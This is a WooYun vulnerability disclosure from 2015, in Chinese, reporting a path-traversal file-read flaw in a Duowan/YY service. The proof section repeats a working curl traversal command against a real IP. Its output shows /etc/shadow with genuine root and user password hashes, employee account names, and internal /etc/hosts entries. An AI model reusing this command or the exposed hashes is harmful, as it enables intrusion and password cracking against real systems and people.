当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092263

漏洞标题:多玩某服务配置不当导致任意系统文件读取(root密码hash)

相关厂商:广州多玩

漏洞作者: boooooom

提交时间:2015-01-16 17:52

修复时间:2015-03-02 17:54

公开时间:2015-03-02 17:54

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-16: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-30: 细节向核心白帽子及相关领域专家公开
2015-02-09: 细节向普通白帽子公开
2015-02-19: 细节向实习白帽子公开
2015-03-02: 细节向公众公开

简要描述:

RT

详细说明:

[root@localhost tmp]# curl 113.107.237.90:8080/../../../../../../../../../../etc/shadow
root:$6$QAicn/l.6Wiv$B00A5EAdSrrCN1xw7dFROi5At7dpZXNfB4ZmVYfr/BNEQg.mDVqlAvlaGDIb0BxvlMlpb4Xx1cxLlzfu6S34j/:16450:0:99999:7:::
daemon:*:15492:0:99999:7:::
bin:*:15492:0:99999:7:::
sys:*:15492:0:99999:7:::
sync:*:15492:0:99999:7:::
games:*:15492:0:99999:7:::
man:*:15492:0:99999:7:::
lp:*:15492:0:99999:7:::
mail:*:15492:0:99999:7:::
news:*:15492:0:99999:7:::
uucp:*:15492:0:99999:7:::
proxy:*:15492:0:99999:7:::
www-data:*:15492:0:99999:7:::
backup:*:15492:0:99999:7:::
list:*:15492:0:99999:7:::
irc:*:15492:0:99999:7:::
gnats:*:15492:0:99999:7:::
nobody:*:16358:0:99999:7:::
libuuid:!:15492:0:99999:7:::
landscape:*:15492:0:99999:7:::
messagebus:*:15492:0:99999:7:::
sshd:*:15492:0:99999:7:::
dspeak:!:15496:0:99999:7:::
yuwanfu:!:15496:0:99999:7:::
hujinli:!:15496:0:99999:7:::
snmp:*:15496:0:99999:7:::
ntp:*:15496:0:99999:7:::
wuhaiting:$6$coA.y18J$fIIIX62XyYAgsAZmRS1lgbIE5M27CltGL/14lNb5pQyOPcws8VAMpTSg58a/UCwgaxdwcqnWQ..lRISpmqj4t1:16403:0:99999:7:::
user_00:!:15585:0:99999:7:::
gaoxiaoyu:!:15966:0:99999:7:::
wengleilei:!:15966:0:99999:7:::
zhangmin:!:15966:0:99999:7:::
zhengxiaoyin:!:15966:0:99999:7:::
mysql:!:15970:0:99999:7:::
zhengyinhe:!:16140:0:99999:7:::
rabbitmq:*:16163:0:99999:7:::
mongodb:*:16171:0:99999:7:::
libiao1:!:16203:0:99999:7:::
chenbing:!:16204:0:99999:7:::
liuguan:!:16204:0:99999:7:::
sisi:!:16204:0:99999:7:::
yanjiaqiao:!:16204:0:99999:7:::
chenshunyao:!:16204:0:99999:7:::
hanfang:!:16204:0:99999:7:::
heliu:!:16204:0:99999:7:::
linbobo:!:16204:0:99999:7:::
linxiaobin:!:16204:0:99999:7:::
litianming:!:16204:0:99999:7:::
tanyewei:!:16204:0:99999:7:::
chenxiaokang:!:16212:0:99999:7:::
wangnian:!:16212:0:99999:7:::
zhanghao1:!:16212:0:99999:7:::
lanzhaobao:!:16225:0:99999:7:::
guanzhong:!:16225:0:99999:7:::
linjianfeng:!:16225:0:99999:7:::
lintianliang:!:16225:0:99999:7:::
huangweisong:!:16225:0:99999:7:::
liaojunlian:!:16225:0:99999:7:::
liuxingzhong:!:16225:0:99999:7:::
zengyueming:!:16225:0:99999:7:::
zhangguorui:!:16225:0:99999:7:::
zhaokeke:!:16225:0:99999:7:::
zhongjianhui:!:16225:0:99999:7:::
zhuangyanbiao:!:16225:0:99999:7:::
zhoupihua:!:16226:0:99999:7:::
chenweijiu:!:16245:0:99999:7:::
zhudate:!:16321:0:99999:7:::
zhuzhenghua:!:16323:0:99999:7:::
jiangnan2:!:16356:0:99999:7:::
tanweiqiang:!:16377:0:99999:7:::
chenrunsheng:!:16399:0:99999:7:::
luoshenjing:!:16400:0:99999:7:::
huangzan:!:16403:0:99999:7:::
wujihong:!:16428:0:99999:7:::
xieyaoyao:!:16428:0:99999:7:::
duxing:!:16428:0:99999:7:::
duxiaoguo:!:16428:0:99999:7:::
yanglin1:!:16428:0:99999:7:::
zhangguanshi:!:16448:0:99999:7:::
wudaochao:!:16448:0:99999:7:::
[root@localhost tmp]# curl 113.107.237.90:8080/../../../../../../../../../../etc/hosts
127.0.1.1 ubuntu localhost
58.215.46.21   mirror.yy.duowan.com
#121.14.241.43 balance.yy.duowan.com
121.14.37.147 balance.yy.duowan.com
121.14.37.153	config.yy.duowan.com
220.181.86.207	sdaemon.yy.duowan.com
121.14.37.153	sdaemon2.yy.duowan.com
119.147.160.90	yycookie.yy.duowan.com
121.14.37.153	rdaemon.yy.duowan.com
220.181.86.207	rdaemon2.yy.duowan.com
113.142.33.209 manager.repos.yy.duowan.com
121.14.43.142	oams.yy.duowan.com
114.111.163.226	oams2.yy.duowan.com
221.228.79.31	bc.yy.duowan.com
221.228.79.32	bc2.yy.duowan.com
#service manager test
113.107.237.90 gameliveprops.yy.duowan.com 
113.106.100.60	advert.yy.com
121.9.240.12 open.m.yy.com
121.14.37.154 servicemgr.yy.duowan.com
106.38.255.160 servicemgr2.yy.duowan.com

漏洞证明:

[root@localhost tmp]# curl 113.107.237.90:8080/../../../../../../../../../../etc/shadow
root:$6$QAicn/l.6Wiv$B00A5EAdSrrCN1xw7dFROi5At7dpZXNfB4ZmVYfr/BNEQg.mDVqlAvlaGDIb0BxvlMlpb4Xx1cxLlzfu6S34j/:16450:0:99999:7:::
daemon:*:15492:0:99999:7:::
bin:*:15492:0:99999:7:::
sys:*:15492:0:99999:7:::
sync:*:15492:0:99999:7:::
games:*:15492:0:99999:7:::
man:*:15492:0:99999:7:::
lp:*:15492:0:99999:7:::
mail:*:15492:0:99999:7:::
news:*:15492:0:99999:7:::
uucp:*:15492:0:99999:7:::
proxy:*:15492:0:99999:7:::
www-data:*:15492:0:99999:7:::
backup:*:15492:0:99999:7:::
list:*:15492:0:99999:7:::
irc:*:15492:0:99999:7:::
gnats:*:15492:0:99999:7:::
nobody:*:16358:0:99999:7:::
libuuid:!:15492:0:99999:7:::
landscape:*:15492:0:99999:7:::
messagebus:*:15492:0:99999:7:::
sshd:*:15492:0:99999:7:::
dspeak:!:15496:0:99999:7:::
yuwanfu:!:15496:0:99999:7:::
hujinli:!:15496:0:99999:7:::
snmp:*:15496:0:99999:7:::
ntp:*:15496:0:99999:7:::
wuhaiting:$6$coA.y18J$fIIIX62XyYAgsAZmRS1lgbIE5M27CltGL/14lNb5pQyOPcws8VAMpTSg58a/UCwgaxdwcqnWQ..lRISpmqj4t1:16403:0:99999:7:::
user_00:!:15585:0:99999:7:::
gaoxiaoyu:!:15966:0:99999:7:::
wengleilei:!:15966:0:99999:7:::
zhangmin:!:15966:0:99999:7:::
zhengxiaoyin:!:15966:0:99999:7:::
mysql:!:15970:0:99999:7:::
zhengyinhe:!:16140:0:99999:7:::
rabbitmq:*:16163:0:99999:7:::
mongodb:*:16171:0:99999:7:::
libiao1:!:16203:0:99999:7:::
chenbing:!:16204:0:99999:7:::
liuguan:!:16204:0:99999:7:::
sisi:!:16204:0:99999:7:::
yanjiaqiao:!:16204:0:99999:7:::
chenshunyao:!:16204:0:99999:7:::
hanfang:!:16204:0:99999:7:::
heliu:!:16204:0:99999:7:::
linbobo:!:16204:0:99999:7:::
linxiaobin:!:16204:0:99999:7:::
litianming:!:16204:0:99999:7:::
tanyewei:!:16204:0:99999:7:::
chenxiaokang:!:16212:0:99999:7:::
wangnian:!:16212:0:99999:7:::
zhanghao1:!:16212:0:99999:7:::
lanzhaobao:!:16225:0:99999:7:::
guanzhong:!:16225:0:99999:7:::
linjianfeng:!:16225:0:99999:7:::
lintianliang:!:16225:0:99999:7:::
huangweisong:!:16225:0:99999:7:::
liaojunlian:!:16225:0:99999:7:::
liuxingzhong:!:16225:0:99999:7:::
zengyueming:!:16225:0:99999:7:::
zhangguorui:!:16225:0:99999:7:::
zhaokeke:!:16225:0:99999:7:::
zhongjianhui:!:16225:0:99999:7:::
zhuangyanbiao:!:16225:0:99999:7:::
zhoupihua:!:16226:0:99999:7:::
chenweijiu:!:16245:0:99999:7:::
zhudate:!:16321:0:99999:7:::
zhuzhenghua:!:16323:0:99999:7:::
jiangnan2:!:16356:0:99999:7:::
tanweiqiang:!:16377:0:99999:7:::
chenrunsheng:!:16399:0:99999:7:::
luoshenjing:!:16400:0:99999:7:::
huangzan:!:16403:0:99999:7:::
wujihong:!:16428:0:99999:7:::
xieyaoyao:!:16428:0:99999:7:::
duxing:!:16428:0:99999:7:::
duxiaoguo:!:16428:0:99999:7:::
yanglin1:!:16428:0:99999:7:::
zhangguanshi:!:16448:0:99999:7:::
wudaochao:!:16448:0:99999:7:::
[root@localhost tmp]# curl 113.107.237.90:8080/../../../../../../../../../../etc/hosts
127.0.1.1 ubuntu localhost
58.215.46.21   mirror.yy.duowan.com
#121.14.241.43 balance.yy.duowan.com
121.14.37.147 balance.yy.duowan.com
121.14.37.153	config.yy.duowan.com
220.181.86.207	sdaemon.yy.duowan.com
121.14.37.153	sdaemon2.yy.duowan.com
119.147.160.90	yycookie.yy.duowan.com
121.14.37.153	rdaemon.yy.duowan.com
220.181.86.207	rdaemon2.yy.duowan.com
113.142.33.209 manager.repos.yy.duowan.com
121.14.43.142	oams.yy.duowan.com
114.111.163.226	oams2.yy.duowan.com
221.228.79.31	bc.yy.duowan.com
221.228.79.32	bc2.yy.duowan.com
#service manager test
113.107.237.90 gameliveprops.yy.duowan.com 
113.106.100.60	advert.yy.com
121.9.240.12 open.m.yy.com
121.14.37.154 servicemgr.yy.duowan.com
106.38.255.160 servicemgr2.yy.duowan.com

修复方案:

修改配置

版权声明:转载请注明来源 boooooom@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-20 15:31

厂商回复:

感谢对于欢聚时代安全工作的支持,我们会尽快修复

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-16 18:36 | 憨厚的王小胖 ( 路人 | Rank:7 漏洞数:1 | 我肯定憨厚啊)

    真是通杀。。。。。

  2. 2015-01-16 18:57 | D_in ( 普通白帽子 | Rank:413 漏洞数:52 | 到我嘴里来)

    这是0day的节奏么

  3. 2015-03-02 18:37 | i3esn0w ( 实习白帽子 | Rank:85 漏洞数:15 | 我是一个大白菜,很大很大的白菜)

    我就想知道怎么发现的